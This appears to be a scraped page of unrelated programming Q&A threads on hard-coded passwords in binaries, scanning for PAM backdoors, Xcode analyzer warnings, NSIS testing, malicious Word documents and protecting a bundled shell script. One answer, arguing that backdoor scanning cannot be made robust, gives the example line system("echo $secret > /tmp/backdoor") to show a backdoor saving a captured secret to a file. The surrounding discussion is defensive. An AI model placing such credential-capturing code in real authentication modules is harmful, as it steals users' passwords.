If a password is hard-coded into a variable in source code such as VB, could someone extract this password by looking at the compiled executable code?
If so, what can be done to avoid this?
Yes, someone could.
Nothing can be done to avoid it. Obfuscation will make it slightly harder.
In the worst case, if someone didn't understand your obfuscated code, they could run your executable in a debugger and read the password from memory just before you use it.
The solution is, of course, not to hard-code important passwords into your binaries.
Yes. The password could be found by watching the program execute in a debugger. If you do nothing, it might even be possible to find by searching for text in the binary file.
What can be done? There are anti-debugging techniques like obfuscation or anti-tampering mechanisms that will cause the executable to blow up when debugged. Obfuscation is probably easy to implement. Anti-tampering will be difficult.
Related
I'm trying to write a pam backdoor scanner, which may call fopen function in pam_sm_authenticate(normal file will not call fopen in this function) to store username and password, but I can't use external command such as "nm, readelf" or something like that, so the only way seems to scan pam_sm_authenticate function and find all call instructions and caculate the address to check if it is calling fopen, but it is too troublesome and i'm not very familiar with ELF file(I even dont know how to find offset of pam_sm_authenticate, I'm useing dlopen and dlsym to get the address..), so I wonder if there is a better or easy way to detect it? Thankyou.
TL;DR: building a robust "pam backdoor scanner" is theoretically impossible, so you should give up now and think about other ways to solve your problem.
Your question is very confusing, but I think what you are asking is: "can I determine programmatically whether pam_sm_authenticate calls fopen".
That is the wrong question to ask, for several reasons:
if pam_sm_authenticate calls foo, and foo calls fopen, then you still have a problem, so you really should be scanning pam_sm_authenticate and every function it calls (recursively),
the fopen is far from the only way to write files: you could also use open, or system (as in system("echo $secret > /tmp/backdoor"), or direct sys_open syscall, or a multitude of other hacks.
finally, the pam_sm_authenticate can use just-in-time compilation techniques to build arbitrary code (including code calling fopen) at runtime, and answering whether it does by examining its code is equivalent to solving the halting problem (i.e. impossible).
I know that I can ignore compiler warnings with -w on a given file in Xcode.
I would like to similarly ignore analyze warnings on a given file (JSONKit.m in this case, which has two potential leaks). I trust that the developer of that library knows what they're doing, and I don't want to maintain a fork of it. Not to mention that I have no clue what's going on in there anyway.
Any ideas?
Don't trust the developer. Figure out why the potential leaks exist and fix them (ideally, sending a patch back to the developer).
If you want to take the lazy way out (j/k ;), you can add code to fix the problem under the analyzer only using:
#ifdef __clang_analyzer__
... release the offending variable here ...
#endif
I prefer this solution to whole-file-disabling because it both exactly identifies the problem area with an easily searchable identifier and it allows the rest of the file to be vetted by the constantly improving analyzer.
Does anyone know of an existing solution to help write tests for a NSIS script?
The motivation is the benefit of knowing whether modifying an existing installation script breaks it or has undesired side effects.
Unfortunately, I think the answer to your question depends at least partially on what you need to verify.
If all you are worried about is that the installation copies the right file(s) to the right places, sets the correct registry information etc., then almost any unit testing tool would probably meet your needs. I'd probably use something like RSpec2, or Cucumber, but that's because I am somewhat familiar with Ruby and like the fact that it would be an xcopy deployment if the scripts needed to be run on another machine. I also like the idea of using a BDD-based solution because the use of a domain-specific language that is very close to readable text would mean that others could more easily understand, and if necessary modify, the test specification when necessary.
If, however you are concerned about the user experience (what progress messages are shown, etc.) then I'm not sure that the tests you would need could be as easily expressed... or at least not without a certain level of pain.
Good Luck! Don't forget to let other people here know when/if you find a solution you like.
Check out Pavonis.
With Pavonis you can compile your NSIS script and get the output of any errors and warnings.
Another solution would be AutoIT.
You can compile your install using Jenkins and the NSIS command line compiler, set up an AutoIT test script and have Jenkins run the test.
reputedly, it is possible to make a "malicious" Word document. Maybe using embedded VB script? Anyway, not sure. My question is, is it possible to make an app that safely scrubs all such insertions from a .doc file? Of course, preferably this app should work without actually opening that file in Word application since presumably that may be sufficient for the machine to get damaged.
Is there something like that out there already? Is this even a problem worthy of discussion or in reality there is nothing really malicious that can be done using the Word documents distributed online?
ADDED LATER: johnnyArt, yes, and when you get dirt on your clothes, make sure to go to mommy and tell her about it. Mommy knows best! As a computer programmer, I am interested in learning more about how the world works, including how the world of .doc files and their embedded malicious scripts works. As for using the antivirus and anti-spyware, I will handle these issues without your precious advice. As will, probably, most other users of this forum.
You should scan the file with your antivirus/spyware of choice.
My advice is, if it has malware in it, it's not worth "cleaning" it for use.
Get yourself a clean copy somewhere else.
I have a shell script stored in the resources folder of my Cocoa app. If used improperly it could be dangerous (even though I have taken precautions to reduce exploits, such as using the absolute path to commands) so is there any way to encrypt the script in binary format, then decrypt it when it needs to be used?
Thanks
It seems as if your concern is about people getting write access to the script and modifying it to run arbitrary code. You could keep a checksum for the script in the binary and compare that with the checksum of the script before you run it. Now, how do you stop people from editing the binary too? Code signing. In fact, if you keep the shell script in the app bundle then editing the script will break the signature of the bundle anyway.
This does not make a lot of sense. If an attacker has access to edit this script file, then they likely have access to edit any number of files, your application is less likely to be a security risk than any number of other things would be attacker could do.
No. If the user will decrypt it to use it, then she can see (and intercept) the clear text at some point. If you think you have "shell-like" things to do, do them in C/ObjC... This can be your friend.
What you're asking for is essentially DRM. A different purpose (“security” instead of thwarting copyright infringement), but the same approach, with the same problems.
In order for the user to be able to normally use the (music|video|script), they must be able to decrypt it. You would do this for them under only the right conditions in your (player|app), but that doesn't matter: no matter how well you hide it, you still have to provide the user with all the technology and keys necessary to decrypt the (music|video|script), so that your (player|app) can do that.
And then, since the user has all the technology and keys necessary to decrypt it, an attacker can and eventually will uncover them all and decrypt the (music|video|script) on their own.
I second Massa's suggestion of switching away from a shell script. This doesn't completely eliminate risk: If an attacker can gain access to write to your shell script, they can gain access to write to a Mach-O executable just as easily. But editing a Mach-O executable is not nearly as easy, so you are at least raising the bar that way.